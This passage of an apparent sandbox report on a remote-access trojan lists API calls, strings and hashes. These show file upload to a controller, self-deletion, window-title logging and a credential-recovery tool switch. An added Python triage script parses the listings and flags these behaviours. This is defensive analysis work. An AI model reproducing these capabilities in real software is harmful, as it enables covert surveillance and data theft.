• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
• _wcslen.LIBCMT ref: 0040D001
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D068
• ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
• ExitProcess.KERNEL32 ref: 0040D09D
Strings
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
Yara matches
Similarity
• API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
• String ID: 6$C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe$del$open
• API String ID: 1579085052-7121636
• Opcode ID: 283c2ff4283ef6ea14c9631ac3abc3b8d6689ce6a044c306617b0cf23f9fad85
• Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
• Opcode Fuzzy Hash: 283c2ff4283ef6ea14c9631ac3abc3b8d6689ce6a044c306617b0cf23f9fad85
• Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
APIs
• lstrlenW.KERNEL32(?), ref: 0041C0C7
• _memcmp.LIBVCRUNTIME ref: 0041C0DF
• lstrlenW.KERNEL32(?), ref: 0041C0F8
• FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
• GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
• QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
• lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
• FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
• _wcslen.LIBCMT ref: 0041C1CC
• FindVolumeClose.KERNEL32(?), ref: 0041C1EC
• GetLastError.KERNEL32 ref: 0041C204
• GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
• lstrcatW.KERNEL32(?,?), ref: 0041C24A
• lstrcpyW.KERNEL32(?,?), ref: 0041C259
• GetLastError.KERNEL32 ref: 0041C261
Strings
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
Yara matches
Similarity
• API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
• String ID: ?
• API String ID: 3941738427-1684325040
• Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
• Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
• Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
• Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$EnvironmentVariable$_wcschr
                                                                                          • String ID:
                                                                                          • API String ID: 3899193279-0
                                                                                          • Opcode ID: 28687395a6aa2078608bd89f57b343956b66557142a9620950dd617db5e8e69e
                                                                                          • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                                                          • Opcode Fuzzy Hash: 28687395a6aa2078608bd89f57b343956b66557142a9620950dd617db5e8e69e
                                                                                          • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                                                          APIs
                                                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                          • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                          • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                          • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                          • API String ID: 2490988753-744132762
                                                                                          • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                          • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                                                          • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                          • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                                                                          APIs
                                                                                          • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                                                          • GetCursorPos.USER32(?), ref: 0041D67A
                                                                                          • SetForegroundWindow.USER32(?), ref: 0041D683
                                                                                          • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                                                          • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                                                          • ExitProcess.KERNEL32 ref: 0041D6F6
                                                                                          • CreatePopupMenu.USER32 ref: 0041D6FC
                                                                                          • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                          • String ID: Close
                                                                                          • API String ID: 1657328048-3535843008
                                                                                          • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                                          • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                                                          • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                                          • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$Info
                                                                                          • String ID:
                                                                                          • API String ID: 2509303402-0
                                                                                          • Opcode ID: 6f6fc0ac27b4b2f00b1102b51bee0220b0be09f2ed36c41455f2b0a14b53fe9c
                                                                                          • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                                                          • Opcode Fuzzy Hash: 6f6fc0ac27b4b2f00b1102b51bee0220b0be09f2ed36c41455f2b0a14b53fe9c
                                                                                          • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                                                          APIs
                                                                                          • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                                                          • _free.LIBCMT ref: 0045137F
                                                                                            • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                          • _free.LIBCMT ref: 004513A1
                                                                                          • _free.LIBCMT ref: 004513B6
                                                                                          • _free.LIBCMT ref: 004513C1
                                                                                          • _free.LIBCMT ref: 004513E3
                                                                                          • _free.LIBCMT ref: 004513F6
                                                                                          • _free.LIBCMT ref: 00451404
                                                                                          • _free.LIBCMT ref: 0045140F
                                                                                          • _free.LIBCMT ref: 00451447
                                                                                          • _free.LIBCMT ref: 0045144E
                                                                                          • _free.LIBCMT ref: 0045146B
                                                                                          • _free.LIBCMT ref: 00451483
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                          • String ID:
                                                                                          • API String ID: 161543041-0
                                                                                          • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                          • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                                                          • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                          • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                                                                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                                                          • __aulldiv.LIBCMT ref: 00408D88
                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                          • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                                                          • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                                                          • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                          • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                                                                          • API String ID: 3086580692-2596673759
                                                                                          • Opcode ID: ec79447335530b9eedf105eee5ae2cdf40cfe98c019c56848c9afd0be4808a34
                                                                                          • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                                                          • Opcode Fuzzy Hash: ec79447335530b9eedf105eee5ae2cdf40cfe98c019c56848c9afd0be4808a34
                                                                                          • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free
                                                                                          • String ID:
                                                                                          • API String ID: 269201875-0
                                                                                          • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                                          • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                                                          • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                                          • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                                                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                                                          • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                                                          • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                                                          • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                                                          • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                                                          • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                          • String ID: /stext "
                                                                                          • API String ID: 1223786279-3856184850
                                                                                          • Opcode ID: 58ff01398609a6f5fcecfea01a89b3ec4c253fa653f0bf16984b79547a95a55e
                                                                                          • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                                                          • Opcode Fuzzy Hash: 58ff01398609a6f5fcecfea01a89b3ec4c253fa653f0bf16984b79547a95a55e
                                                                                          • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
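Added triage example (analyst tooling written for this page; it is not part of the Joe Sandbox report and not Remcos or Joe Sandbox code). The per-function listings above carry three behaviours worth pulling out automatically: the LoadLibraryA/GetProcAddress block that resolves getaddrinfo, getnameinfo and freeaddrinfo from \ws2_32 and \wship6 (my reading: this matches the wspiapi.h IPv6 compatibility shim that the compiler links in, so on its own it is weak evidence of "dynamic API resolution"); the CreateFileW/GetFileSizeEx/SetFilePointerEx/ReadFile block with a subcall into send and the string "Uploading file to Controller:" (a chunked file upload to the C2); and the GetModuleFileNameW/Sleep/DeleteFileW block with the string `/stext "`, which is the save-to-text switch of the NirSoft command-line recovery tools (whether this sample bundles such a tool is not shown in this section). The script parses the bullet format used by these blocks and applies hypothetical rule names of my own. The three-entry sample is abbreviated from the listing above and labelled as constructed; the rules are assumptions, not Joe Sandbox signatures.

```python
"""Triage helper for Joe Sandbox per-function API listings (added example).

Parses the "APIs / Strings / Memory Dump Source / Similarity" bullet blocks
and applies a few capability rules. Rule names are hypothetical.
"""
import re
from dataclasses import dataclass, field

# One API bullet: optional "Part of subcall function XXXXXXXX:" prefix,
# then Name.MODULE, optional (args), then ", ref: ADDR" or " ref: ADDR".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$"
)


@dataclass
class FuncEntry:
    # (name, module, args, ref, direct) where direct=False for subcall lines
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)   # from "String ID:" split on $
    fuzzy_hash: str = ""

    def direct_names(self):
        return {c[0] for c in self.calls if c[4]}

    def all_names(self):
        return {c[0] for c in self.calls}


def parse_listing(text):
    """Split the listing at each "APIs" header and collect calls/strings."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line == "APIs":
            cur = FuncEntry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            cur.calls.append((m["name"], m["mod"], m["args"] or "",
                              m["ref"], m["sub"] is None))
        elif line.startswith("String ID:"):
            ids = line[len("String ID:"):].strip()
            cur.strings = [s for s in ids.split("$") if s] if ids else []
        elif line.startswith("Instruction Fuzzy Hash:"):
            cur.fuzzy_hash = line.split(":", 1)[1].strip()
    return entries


def triage(entry):
    """Hypothetical rules; order of hits follows rule order."""
    names, direct, hits = entry.all_names(), entry.direct_names(), []
    if {"LoadLibraryA", "GetProcAddress"} <= direct:
        hits.append("dynamic_api_resolution")   # weak: also matches CRT shims
    if {"CreateFileW", "ReadFile"} <= direct and "send" in names:
        hits.append("file_read_to_socket")
    if any(s.startswith("Uploading file") for s in entry.strings):
        hits.append("controller_upload_string")
    if any("/stext" in s for s in entry.strings):
        hits.append("nirsoft_stext_switch")
    if "Shell_NotifyIconA" in direct:
        hits.append("tray_icon")
    return hits


def triage_listing(text):
    return [(e.fuzzy_hash, triage(e)) for e in parse_listing(text)]


# Constructed sample: three blocks abbreviated from the report listing.
SAMPLE = r"""
APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
• LoadLibraryA.KERNEL32(?), ref: 00414E52
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
• FreeLibrary.KERNEL32(00000000), ref: 00414E79
Strings
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Library$AddressFreeProc$Load$DirectorySystem
• String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
• Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
• GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
• __aulldiv.LIBCMT ref: 00408D88
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
• SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
• ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
• CloseHandle.KERNEL32(00000000), ref: 00408F9F
Similarity
• String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
• Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
• DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
Similarity
• String ID: /stext "
"""

if __name__ == "__main__":
    for fuzzy, hits in triage_listing(SAMPLE):
        print(fuzzy or "(no fuzzy hash)", hits)
```

Subcall lines are kept but marked indirect, so a rule can require a direct call (CreateFileW, ReadFile) while accepting send reached through a helper, which is exactly how the upload block above presents it. Paste a whole function section of the report into `SAMPLE` to run it over the real listing.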
                                                                                          APIs
                                                                                            • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
                                                                                          • GetLastError.KERNEL32 ref: 00455D6F
                                                                                          • __dosmaperr.LIBCMT ref: 00455D76
                                                                                          • GetFileType.KERNEL32(00000000), ref: 00455D82
                                                                                          • GetLastError.KERNEL32 ref: 00455D8C
                                                                                          • __dosmaperr.LIBCMT ref: 00455D95
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                                                          • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                                                          • GetLastError.KERNEL32 ref: 00455F31
                                                                                          • __dosmaperr.LIBCMT ref: 00455F38
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                          • String ID: H
                                                                                          • API String ID: 4237864984-2852464175
                                                                                          • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                          • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                                                          • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                          • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free
                                                                                          • String ID: \&G$\&G$`&G
                                                                                          • API String ID: 269201875-253610517
                                                                                          • Opcode ID: 4c79e0627c8f19053a14b01c9d065665146560bb3788e30f1103ba49badb8175
                                                                                          • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                                                          • Opcode Fuzzy Hash: 4c79e0627c8f19053a14b01c9d065665146560bb3788e30f1103ba49badb8175
                                                                                          • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 65535$udp
                                                                                          • API String ID: 0-1267037602
                                                                                          • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                          • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                                                          • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                          • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                                                          APIs
                                                                                          • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                                                          • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                                                          • GetForegroundWindow.USER32 ref: 0040AD84
                                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                                                          • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
                                                                                          • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                                                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                          • String ID: [${ User has been idle for $ minutes }$]
                                                                                          • API String ID: 911427763-3954389425
                                                                                          • Opcode ID: c912e197c73d9db89f024b1bb19b90fd33058fd4241f711361d4b0a09d8c727e
                                                                                          • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                                                                          • Opcode Fuzzy Hash: c912e197c73d9db89f024b1bb19b90fd33058fd4241f711361d4b0a09d8c727e
                                                                                          • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F
                                                                                          APIs
                                                                                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                            • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 0041374F
                                                                                            • Part of subcall function 00413733: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                                                                            • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                                                          • ExitProcess.KERNEL32 ref: 0040D9FF
